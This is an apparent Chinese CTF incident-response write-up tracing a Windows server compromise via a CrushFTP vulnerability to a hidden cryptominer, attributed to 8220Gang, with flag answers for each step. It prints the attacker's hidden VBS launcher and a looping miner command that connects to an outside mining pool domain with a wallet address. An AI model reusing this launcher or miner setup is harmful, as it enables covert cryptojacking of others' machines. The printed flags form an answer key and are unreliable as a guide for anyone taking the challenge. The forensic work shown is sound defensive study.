Solar月赛(应急响应)——攻击者使用什么漏洞获取了服务器的配置文件?

某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器。

文章目录


事件介绍

起因:某某文化有限公司的运维小王刚刚搭建服务器发现cpu 莫名的异常的升高请你帮助小王排查一下服务器。

帮助小王找到是什么漏洞导致了小王的运维生涯受到了打击?(回答攻击者利用的漏洞编号)

主机pass :Ngy@667788
flag格式为:flag{CVE-2020-12345}

相关资料下载:

链接: https://pan.baidu.com/s/1vAXXygEwdhXtLeoF8yA6KA?pwd=9d97 提取码: 9d97

解压密码:MWhEYGjaHkjk3UkE


事件1:帮助小王找到是什么漏洞?

首先我们打开下载的镜像文件放到虚拟机里运行,发现是一台Windows 10 Server的服务器:

根据题目的 "帮助小王找到是什么漏洞?" ,我们可以发现桌面有几个文件,打开看一下;

在浏览器里搜索两个文件的名字,可以发现这两个都是CVE漏洞:


输入flag后发现都不对,然后我也是问AI他们各自都有哪些CVE漏洞,最后也是找到了CrushFTP的一个CVE漏洞符合:

flag{CVE-2025-31161}

--

事件2:系统每天晚上系统都会卡卡的帮小明找到问题出在了那?

根据题目的 "刚刚搭建服务器发现cpu莫名的异常的升高" ,我们可以想到要么是开机启动项存在可疑任务,或者就是计划任务存在挖矿程序。

根据上述这些思路,我们可以进行相应的排查:

(1)计划任务检查

  • 首先在搜索框任务计划程序 查看有哪些可疑的进程正在运行;
  • 单击【开始】>【设置】>【控制面板】>【任务计划程序】;
  • 单击【开始】>【运行】,输入 "cmd",然后在命令提示符窗口中输入 "schtasks.exe"

(2)检查开机启动项:

  • 单击【开始】>【所有程序】>【启动】,默认情况下此目录为空;
  • 单击【开始】>【运行】,输入 "msconfig",在弹出的窗口中切换到 "启动" 选项卡,查看是否存在命名异常的启动项目。若有,取消勾选该项目,并根据命令中显示的路径删除对应的文件。

(当然上述这些方法可能都太麻烦了,有没有更简单的办法。)

有的,这时候我们也可以使用工具帮助我们进行排查:

我个人一般使用 D盾Autoruns 来进行相应的检查

话不多说,直接执行这两个程序(标红的表示可能是恶意程序或者计划任务)

也是发现了部分异样:计划任务

资源管理器:

然后也是找到了恶意的计划任务sql


sql backing up就是导致每晚卡顿的原因

flag{sqlbackingup}

--

事件3:恶意域名是什么?

根据之前的发现,继续在这个文件夹里发掘看看还有什么收获。

bash 复制代码
set ws=createobject("wscript.shell")
ws.Run """sqlwscript.cmd""",0
  • set ws=createobject("wscript.shell")

    • createobject("wscript.shell"):创建一个 WScript.Shell 对象的实例。这个对象能让脚本与 Windows 操作系统进行交互,例如执行程序、创建快捷方式、读写注册表等。
    • set ws = ...:把创建好的 WScript.Shell 对象赋值给变量ws,方便后续使用。
  • ws.Run """sqlwscript.cmd""",0

    • ws.Run ...:调用 WScript.Shell 对象的Run方法来执行外部程序或脚本。
    • """sqlwscript.cmd""":要执行的命令。这里使用三重引号是为了正确处理路径中可能存在的空格。第一个和第三个引号是 VBScript 字符串的定界符,中间的两个引号会被解析为批处理文件路径里的一个引号。
    • ,0:Run方法的第二个参数,表示窗口样式。值为 0 时,意味着程序会在后台运行,也就是不会显示窗口。

接下来再查看sqlwscript这个脚本:

代码如下:

php 复制代码
@echo off
cd /d "%~dp0"
:start
sqlwpr.exe -a rx/0 --url b.oracleservice.top --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -t 0
goto start

从上面我们可以看到恶意的url了:

flag{b.oracleservice.top}

--

事件4:疑似是什么组织发动的攻击?

然后在文件夹发现一个应用程序sqlwpr,对刚才的代码进行分析:

  1. 基础设置:
    • @echo off:使命令执行过程不在控制台显示,保持界面干净。
    • cd /d "%~dp0":将工作目录切换到脚本所在目录,确保后续操作路径无误。
  2. 挖矿主循环:
    • :start和goto start构成无限循环,让挖矿程序持续运行。
    • sqlwpr.exe -a rx/0 --url b.oracleservice.top --user ... -t 0:调用挖矿程序进行加密货币挖掘。其中:
    • -a rx/0:采用 RandomX 算法,常用于门罗币(XMR)等加密货币的挖掘。
    • --url b.oracleservice.top:连接到指定的矿池服务器,该服务器域名显示与 Oracle 无关,是用于接收挖矿算力的远程地址。
    • --user ...:使用的矿工账户,是一个较长的字符串,用于标识挖矿收益的归属。
      - -t 0:设置线程数为 0,意味着程序会自动使用所有可用 CPU 核心,这会使 CPU 使用率大幅上升。

随后搜索恶意域名,发现具体的组织:

flag{8220Gang}

--

事件5:攻击者C2服务器IP是什么?

查看挖矿程序的上传时间,确定时间大概在2025.5.27 23:20:00左右

随后在Win + R 唤出cmd,然后输入eventvwr.msc 打开系统日志管理:

查询windows的安全日志,筛选 5156 事件(Windows 过滤平台放行连接),逐一查询这段时间之后powershell的出战痕迹

随后也是找到了相应的IP地址。具体如何筛选可以看这篇文章:Windows日志分析

当然,也可以直接导出筛选日志进行关键词搜索

将已筛选的日志导出为txt文件,然后直接搜索powershell.exe关键词,找出可疑的出站目的IP地址,即为C2服务器IP。

flag{156.238.230.57}

总结

没什么好说的,多学多练多复习。

相关推荐
野熊佩骑1 分钟前
CentOS7二进制安装包方式部署K8S集群之CA根证书生成
linux·运维·docker·云原生·容器·kubernetes·centos
每天更新20 分钟前
linux内核时间&定时器&延时
linux·运维·服务器
snpgroupcn23 分钟前
SAP S/4HANA迁移方法选哪种?选择性数据转换是否合适?企业需要考虑哪些关键因素!
运维·数据库·云计算
杜子不疼.24 分钟前
【Linux】冯 • 诺依曼体系结构
linux·运维·服务器
门前灯30 分钟前
Linux系统之msgexec 命令详解
linux·运维·服务器·msgexec
東雪蓮☆2 小时前
MySQL 全量 + 增量备份脚本(RPM 安装)实践与问题解析
linux·运维·mysql
落羽的落羽2 小时前
【Linux系统】快速入门一些常用的基础指令
linux·服务器·人工智能·学习·机器学习·aigc
妮妮喔妮2 小时前
docker-compose端口冲突问题
运维·docker·容器
Hello.Reader2 小时前
Kafka 安全SASL 认证全栈实战从 JAAS 到 Kerberos、PLAIN、SCRAM、OAUTH 与委托令牌
分布式·安全·kafka
xixixi777772 小时前
SOC(安全运营中心)
网络·安全·soc·安全运营中心